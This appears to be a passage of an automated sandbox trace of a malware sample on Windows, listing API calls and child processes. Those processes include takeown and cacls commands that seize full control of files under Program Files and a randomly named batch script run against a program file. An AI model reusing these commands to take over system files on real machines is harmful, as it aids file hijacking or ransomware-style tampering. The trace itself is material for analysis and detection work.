[0201.251] SetLastError (dwErrCode=0x20) [0201.252] GetLastError () returned 0x20 [0201.252] SetLastError (dwErrCode=0x20) [0201.252] GetLastError () returned 0x20 [0201.253] SetLastError (dwErrCode=0x20) [0201.253] GetLastError () returned 0x20 [0201.253] SetLastError (dwErrCode=0x20) [0201.253] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x1000) returned 0x5397f0 [0201.255] WriteFile (in: hFile=0x80, lpBuffer=0x18ea08*, nNumberOfBytesToWrite=0x49, lpNumberOfBytesWritten=0x18e334, lpOverlapped=0x0 | out: lpBuffer=0x18ea08*, lpNumberOfBytesWritten=0x18e334*=0x49, lpOverlapped=0x0) returned 1 [0201.256] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5377a8 | out: hHeap=0x520000) returned 1 [0201.257] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x18fedc | out: phModule=0x18fedc) returned 0 [0201.257] ExitProcess (uExitCode=0x1) [0201.257] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5360a8 | out: hHeap=0x520000) returned 1 Process: id = "198" image_name = "cacls.exe" filename = "c:\\windows\\syswow64\\cacls.exe" page_root = "0x28f1e000" os_pid = "0x67c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "179" os_parent_pid = "0x74c" cmd_line = "cacls \"C:\\Program Files\\Windows Journal\\Journal.exe\" /E /G 5p5NrGJn0jS HALPmcxz:F /C" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 748 os_tid = 0x4e8 Process: id = "199" image_name = "takeown.exe" filename = "c:\\windows\\syswow64\\takeown.exe" page_root = "0x1db60000" os_pid = "0x91c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "173" os_parent_pid = "0x6b8" cmd_line = "takeown /F \"C:\\Program Files\\Windows Journal\\component.exe\"" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 752 os_tid = 0xa70 Process: id = "200" image_name = "cacls.exe" filename = "c:\\windows\\syswow64\\cacls.exe" page_root = "0x1af69000" os_pid = "0xac4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "186" os_parent_pid = "0xaec" cmd_line = "cacls \"C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp\" /E /G 5p5NrGJn0jS HALPmcxz:F /C" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 754 os_tid = 0x38c Process: id = "201" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x1d84a000" os_pid = "0x7d8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa7c" cmd_line = "cmd /c \"\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\" \"C:\\Program Files\\Windows Portable Devices\\mxslipstream.exe\"\"" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 755 os_tid = 0xa94 [0208.519] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2ef9fc | out: lpSystemTimeAsFileTime=0x2ef9fc*(dwLowDateTime=0x3501c2c0, dwHighDateTime=0x1d68287)) [0208.519] GetCurrentProcessId () returned 0x7d8 [0208.519] GetCurrentThreadId () returned 0xa94 [0208.519] GetTickCount () returned 0x116052f [0208.519] QueryPerformanceCounter (in: lpPerformanceCount=0x2ef9f4 | out: lpPerformanceCount=0x2ef9f4*=32885764649) returned 1 [0208.521] GetModuleHandleA (lpModuleName=0x0) returned 0x49da0000 [0208.522] __set_app_type (_Type=0x1) [0208.522] __p__fmode () returned 0x770331f4 [0208.522] __p__commode () returned 0x770331fc [0208.522] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49dc21a6) returned 0x0 [0208.522] __getmainargs (in: _Argc=0x49dc4238, _Argv=0x49dc4240, _Env=0x49dc423c, _DoWildCard=0, _StartInfo=0x49dc4140 | out: _Argc=0x49dc4238, _Argv=0x49dc4240, _Env=0x49dc423c) returned 0 [0208.522] GetCurrentThreadId () returned 0xa94 [0208.522] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xa94) returned 0x60 [0208.522] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0208.522] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0208.522] SetThreadUILanguage (LangId=0x0) returned 0x409 [0209.225] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0209.225] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ef98c | out: phkResult=0x2ef98c*=0x0) returned 0x2 [0209.225] VirtualQuery (in: lpAddress=0x2ef9c3, lpBuffer=0x2ef95c, dwLength=0x1c | out: lpBuffer=0x2ef95c*(BaseAddress=0x2ef000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0209.225] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x2ef95c, dwLength=0x1c | out: lpBuffer=0x2ef95c*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0209.226] VirtualQuery (in: lpAddress=0x1f1000, lpBuffer=0x2ef95c, dwLength=0x1c | out: lpBuffer=0x2ef95c*(BaseAddress=0x1f1000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0209.226] VirtualQuery (in: lpAddress=0x1f3000, lpBuffer=0x2ef95c, dwLength=0x1c | out: lpBuffer=0x2ef95c*(BaseAddress=0x1f3000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0209.226] VirtualQuery (in: lpAddress=0x2f0000, lpBuffer=0x2ef95c, dwLength=0x1c | out: lpBuffer=0x2ef95c*(BaseAddress=0x2f0000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0xa0000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0209.226] GetConsoleOutputCP () returned 0x1b5 [0209.226] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0209.226] SetConsoleCtrlHandler (HandlerRoutine=0x49dbe72a, Add=1) returned 1 [0209.226] _get_osfhandle (_FileHandle=1) returned 0x7 [0209.226] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0209.226] _get_osfhandle (_FileHandle=1) returned 0x7 [0209.226] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0209.227] _get_osfhandle (_FileHandle=1) returned 0x7 [0209.227] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0209.227] _get_osfhandle (_FileHandle=0) returned 0x3 [0209.227] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0209.227] _get_osfhandle (_FileHandle=0) returned 0x3 [0209.227] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0209.228] GetEnvironmentStringsW () returned 0x3a2118* [0209.228] GetProcessHeap () returned 0x390000 [0209.228] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0xaca) returned 0x3a2bf0 [0209.228] FreeEnvironmentStringsW (penv=0x3a2118) returned 1 [0209.228] GetProcessHeap () returned 0x390000 [0209.228] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0x4) returned 0x3a18b0 [0209.228] GetEnvironmentStringsW () returned 0x3a2118* [0209.229] GetProcessHeap () returned 0x390000 [0209.229] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0xaca) returned 0x3a36c8 [0209.229] FreeEnvironmentStringsW (penv=0x3a2118) returned 1 [0209.229] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ee8fc | out: phkResult=0x2ee8fc*=0x68) returned 0x0 [0209.229] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ee904, lpData=0x2ee908, lpcbData=0x2ee900*=0x1000 | out: lpType=0x2ee904*=0x0, lpData=0x2ee908*=0x0, lpcbData=0x2ee900*=0x1000) returned 0x2 [0209.229] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ee904, lpData=0x2ee908, lpcbData=0x2ee900*=0x1000 | out: lpType=0x2ee904*=0x4, lpData=0x2ee908*=0x1, lpcbData=0x2ee900*=0x4) returned 0x0 [0209.229] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ee904, lpData=0x2ee908, lpcbData=0x2ee900*=0x1000 | out: lpType=0x2ee904*=0x0, lpData=0x2ee908*=0x1, lpcbData=0x2ee900*=0x1000) returned 0x2 [0209.229] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ee904, lpData=0x2ee908, lpcbData=0x2ee900*=0x1000 | out: lpType=0x2ee904*=0x4, lpData=0x2ee908*=0x0, lpcbData=0x2ee900*=0x4) returned 0x0 [0209.229] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ee904, lpData=0x2ee908, lpcbData=0x2ee900*=0x1000 | out: lpType=0x2ee904*=0x4, lpData=0x2ee908*=0x40, lpcbData=0x2ee900*=0x4) returned 0x0 [0209.229] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ee904, lpData=0x2ee908, lpcbData=0x2ee900*=0x1000 | out: lpType=0x2ee904*=0x4, lpData=0x2ee908*=0x40, lpcbData=0x2ee900*=0x4) returned 0x0 [0209.229] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ee904, lpData=0x2ee908, lpcbData=0x2ee900*=0x1000 | out: lpType=0x2ee904*=0x0, lpData=0x2ee908*=0x40, lpcbData=0x2ee900*=0x1000) returned 0x2 [0209.229] RegCloseKey (hKey=0x68) returned 0x0 [0209.230] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ee8fc | out: phkResult=0x2ee8fc*=0x68) returned 0x0 [0209.230] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ee904, lpData=0x2ee908, lpcbData=0x2ee900*=0x1000 | out: lpType=0x2ee904*=0x0, lpData=0x2ee908*=0x40, lpcbData=0x2ee900*=0x1000) returned 0x2 [0209.230] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ee904, lpData=0x2ee908, lpcbData=0x2ee900*=0x1000 | out: lpType=0x2ee904*=0x4, lpData=0x2ee908*=0x1, lpcbData=0x2ee900*=0x4) returned 0x0 [0209.230] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ee904, lpData=0x2ee908, lpcbData=0x2ee900*=0x1000 | out: lpType=0x2ee904*=0x0, lpData=0x2ee908*=0x1, lpcbData=0x2ee900*=0x1000) returned 0x2 [0209.230] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ee904, lpData=0x2ee908, lpcbData=0x2ee900*=0x1000 | out: lpType=0x2ee904*=0x4, lpData=0x2ee908*=0x0, lpcbData=0x2ee900*=0x4) returned 0x0 [0209.230] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ee904, lpData=0x2ee908, lpcbData=0x2ee900*=0x1000 | out: lpType=0x2ee904*=0x4, lpData=0x2ee908*=0x9, lpcbData=0x2ee900*=0x4) returned 0x0 [0209.230] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ee904, lpData=0x2ee908, lpcbData=0x2ee900*=0x1000 | out: lpType=0x2ee904*=0x4, lpData=0x2ee908*=0x9, lpcbData=0x2ee900*=0x4) returned 0x0 [0209.230] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ee904, lpData=0x2ee908, lpcbData=0x2ee900*=0x1000 | out: lpType=0x2ee904*=0x0, lpData=0x2ee908*=0x9, lpcbData=0x2ee900*=0x1000) returned 0x2 [0209.230] RegCloseKey (hKey=0x68) returned 0x0 [0209.230] time (in: timer=0x0 | out: timer=0x0) returned 0x5f51e2ec [0209.230] srand (_Seed=0x5f51e2ec) [0209.230] GetCommandLineW () returned="cmd /c \"\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\" \"C:\\Program Files\\Windows Portable Devices\\mxslipstream.exe\"\"" [0209.230] GetCommandLineW () returned="cmd /c \"\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\" \"C:\\Program Files\\Windows Portable Devices\\mxslipstream.exe\"\"" [0209.231] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0209.231] GetProcessHeap () returned 0x390000 [0209.231] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0x210) returned 0x3a2118 [0209.231] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3a2120, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0209.232] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0209.232] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0209.232] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0209.232] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0209.232] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0209.232] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0209.232] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0209.232] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0209.232] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0209.232] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0209.232] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0209.232] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0209.232] GetProcessHeap () returned 0x390000 [0209.232] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x3a2bf0 | out: hHeap=0x390000) returned 1 [0209.232] GetEnvironmentStringsW () returned 0x3a2330* [0209.233] GetProcessHeap () returned 0x390000 [0209.233] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0xae2) returned 0x3a4c90 [0209.233] FreeEnvironmentStringsW (penv=0x3a2330) returned 1 [0209.233] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0209.233] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0209.233] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0209.233] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0209.234] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0209.234] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0209.234] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0209.234] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0209.234] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0209.234] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0209.234] GetProcessHeap () returned 0x390000 [0209.234] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0x54) returned 0x3a17e0 [0209.234] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2ef6c8 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0209.234] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x2ef6c8, lpFilePart=0x2ef6c4 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x2ef6c4*="Desktop") returned 0x25 [0209.234] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0209.234] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2ef444 | out: lpFindFileData=0x2ef444*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2b8829a0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x2b8829a0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x3a5780 [0209.235] FindClose (in: hFindFile=0x3a5780 | out: hFindFile=0x3a5780) returned 1 [0209.235] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x2ef444 | out: lpFindFileData=0x2ef444*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2b8829a0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x2b8829a0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x3a5780 [0209.235] FindClose (in: hFindFile=0x3a5780 | out: hFindFile=0x3a5780) returned 1 [0209.235] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0209.235] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x2ef444 | out: lpFindFileData=0x2ef444*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x444bc0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x444bc0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x3a5780 [0209.236] FindClose (in: hFindFile=0x3a5780 | out: hFindFile=0x3a5780) returned 1 [0209.236] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0209.236] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0209.236] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0209.236] GetProcessHeap () returned 0x390000 [0209.236] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x3a4c90 | out: hHeap=0x390000) returned 1 [0209.236] GetEnvironmentStringsW () returned 0x3a41a0* [0209.236] GetProcessHeap () returned 0x390000 [0209.236] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0xb36) returned 0x3a5fc0 [0209.237] FreeEnvironmentStringsW (penv=0x3a41a0) returned 1 [0209.237] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0209.237] GetProcessHeap () returned 0x390000 [0209.237] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x3a17e0 | out: hHeap=0x390000) returned 1 [0209.237] GetProcessHeap () returned 0x390000 [0209.237] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0x400e) returned 0x3a6b00 [0209.238] GetProcessHeap () returned 0x390000 [0209.238] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0xf4) returned 0x3a2e70 [0209.238] GetProcessHeap () returned 0x390000 [0209.238] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0x4008) returned 0x3aab18 [0209.238] GetProcessHeap () returned 0x390000 [0209.238] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0x4008) returned 0x3aeb28 [0209.239] GetProcessHeap () returned 0x390000 [0209.239] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x3a6b00 | out: hHeap=0x390000) returned 1 [0209.239] GetConsoleOutputCP () returned 0x1b5 [0209.240] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0209.240] GetUserDefaultLCID () returned 0x409 [0209.241] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49dc4950, cchData=8 | out: lpLCData=":") returned 2 [0209.241] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2ef808, cchData=128 | out: lpLCData="0") returned 2 [0209.241] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2ef808, cchData=128 | out: lpLCData="0") returned 2 [0209.241] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2ef808, cchData=128 | out: lpLCData="1") returned 2 [0209.241] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49dc4940, cchData=8 | out: lpLCData="/") returned 2 [0209.241] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49dc4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0209.242] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49dc4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0209.242] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49dc4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0209.242] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49dc4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0209.242] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49dc4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0209.242] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49dc4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0209.242] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49dc4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0209.242] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49dc4930, cchData=8 | out: lpLCData=".") returned 2 [0209.242] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49dc4920, cchData=8 | out: lpLCData=",") returned 2 [0209.242] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0209.244] GetProcessHeap () returned 0x390000 [0209.244] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x0, Size=0x20c) returned 0x3a2f70 [0209.244] GetConsoleTitleW (in: lpConsoleTitle=0x3a2f70, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0209.244] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0209.244] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0209.244] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0209.245] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0209.246] GetProcessHeap () returned 0x390000 [0209.246] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0x400a) returned 0x3a6b00 [0209.246] GetProcessHeap () returned 0x390000 [0209.246] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x3a6b00 | out: hHeap=0x390000) returned 1 [0209.249] _wcsicmp (_String1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"", _String2=")") returned -7 [0209.249] _wcsicmp (_String1="FOR", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 68 [0209.249] _wcsicmp (_String1="FOR/?", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 68 [0209.249] _wcsicmp (_String1="IF", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 71 [0209.249] _wcsicmp (_String1="IF/?", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 71 [0209.249] _wcsicmp (_String1="REM", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 80 [0209.249] _wcsicmp (_String1="REM/?", _String2="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\"") returned 80 [0209.249] GetProcessHeap () returned 0x390000 [0209.249] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0x58) returned 0x3a3188 [0209.249] GetProcessHeap () returned 0x390000 [0209.249] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0x72) returned 0x3b2b50 [0209.253] GetProcessHeap () returned 0x390000 [0209.253] RtlAllocateHeap 